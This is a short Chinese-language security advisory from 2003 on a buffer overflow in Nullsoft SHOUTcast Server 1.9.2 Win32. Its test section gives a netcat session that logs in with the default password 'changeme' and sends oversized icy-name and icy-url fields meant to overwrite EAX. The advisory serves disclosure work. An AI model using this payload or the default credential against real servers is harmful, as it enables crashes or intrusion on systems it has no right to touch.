Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞

Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞

发布时间：2003-11-03
更新时间：2003-11-03
严重程度：高
威胁程度：普通用户访问权限
错误类型：环境错误
利用方式：服务器模式

BUGTRAQ ID：8954

受影响系统

    NullSoft Shoutcast Server 1.9.2 Win32

详细描述
lsoft SHOUTcast Server由于对授权用户提供的命令缺少充分边界检查，登录后提交超长字符串的icy-name(Server Desc)和icy-url(Stream URL)命令，可导致触发溢出.

测试代码
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

...
stream audio data
...

P.S. Default password "changeme" !!!

相关信息
HEX <hex@hex_net_ru.securityfocus.com>.
参考：http://www.securityfocus.com/archive/1/343177
相关主页：http://www.shoutcast.com/